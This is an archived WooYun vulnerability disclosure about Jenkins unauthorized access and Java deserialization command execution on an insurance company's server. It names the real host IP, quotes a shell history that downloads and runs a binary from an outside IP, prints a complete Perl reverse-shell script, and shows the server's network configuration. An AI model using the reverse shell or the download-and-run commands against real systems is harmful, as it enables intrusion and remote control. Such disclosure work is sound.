乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-24: 细节已通知厂商并且等待厂商处理中 2016-03-24: 厂商已经确认,细节仅向厂商公开 2016-04-03: 细节向核心白帽子及相关领域专家公开 2016-04-13: 细节向普通白帽子公开 2016-04-23: 细节向实习白帽子公开 2016-05-08: 细节向公众公开
1.http://**.**.*******^^+java反序^*****2.http://**.**.**/job/site_*****b389ce24b076ab6197cd.png&qu**********^^**********41a96ff6218513e0560f.png&qu**********e01fd350f5d6ce85ae5d.png&qu********************^^经让^********************sh_history ********************gt;ps********** 9 2*****3.://**.**.**//120.192.246.90:6546/2huizhen -P /tmp/;cd /tmp;chmod 777 2huizhen;./2huizhen_*****t**********de&g*****4.http://**.**.**/_*****^^家都^**********1260d1fb309cea21cc7e.png&qu**********i.p********************usr/bin/********** ********** **********ict;**********ket;**********andle********** ********** != 2)**********Remote_IP Remot**********exit ********** ********** ********** = $ARG********** = $ARGV********** **********ame("tc**********mote_port, inet_********** **********bin/bash -********** ********** SOCK_STREA********** **********toflush**********toflus********** ********** "can not c********** **********lt;&SO**********>&S**********>&S********** **********hell.\n"********** **********hell)**********OCK;********** **********;/code********************fig**********BROADCAST,RUNNING,**********255.255.248.0 br**********5e txqueuelen **********40 bytes 6712**********opped 0 ove**********82 bytes 539**********overruns 0 carr********************AST,RUNNING,MUL********** 255.255.252.0 br**********53 txqueuelen ********** bytes 3160030**********opped 0 ove********** bytes 17078979**********overruns 0 carr********************BACK,RUNNING**********0.1 netma**********len 0 (Loc**********9 bytes 4137**********opped 0 ove**********9 bytes 4137**********overruns 0 carr********************de&g**********^么^*****
http://123.57.39.190jenkins 项目未授权访问+java反序列化命令执行http://123.57.39.190:8080/job/site
华夏保险
好像这个系统已经让人插了后门cat /home/cms_int/.bash_history 最后几行
ps axkill -s 9 26927wget http://120.192.246.90:6546/2huizhen -P /tmp/;cd /tmp;chmod 777 2huizhen;./2huizhenexit
http://120.192.246.90:6546/这几个工具 大家都懂的。
weiwei.pl
#!/usr/bin/perl -w # use strict; use Socket; use IO::Handle; if($#ARGV+1 != 2){ print "$#ARGV $0 Remote_IP Remote_Port \n"; exit 1; } my $remote_ip = $ARGV[0]; my $remote_port = $ARGV[1]; my $proto = getprotobyname("tcp"); my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip)); my $shell = '/bin/bash -i'; socket(SOCK, AF_INET, SOCK_STREAM, $proto); STDOUT->autoflush(1); SOCK->autoflush(1); connect(SOCK,$pack_addr) or die "can not connect:$!"; open STDIN, "<&SOCK"; open STDOUT, ">&SOCK"; open STDERR, ">&SOCK"; print "Enjoy the shell.\n"; system($shell); close SOCK; exit 0;
ifconfig -a
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.173.5.9 netmask 255.255.248.0 broadcast 10.173.7.255 ether 00:16:3e:00:68:5e txqueuelen 1000 (Ethernet) RX packets 1433800840 bytes 67121663795 (62.5 GiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 11861782 bytes 5397221371 (5.0 GiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 123.57.39.190 netmask 255.255.252.0 broadcast 123.57.39.255 ether 00:16:3e:00:2e:53 txqueuelen 1000 (Ethernet) RX packets 7397850480 bytes 316003053060 (294.3 GiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 325398474883 bytes 170789798721155 (155.3 TiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 loop txqueuelen 0 (Local Loopback) RX packets 7195279 bytes 4137380599 (3.8 GiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 7195279 bytes 4137380599 (3.8 GiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
就证明这么多。。
jenkins java反序列化命令执行
危害等级:中
漏洞Rank:9
确认时间:2016-03-24 14:15
处理中
暂无
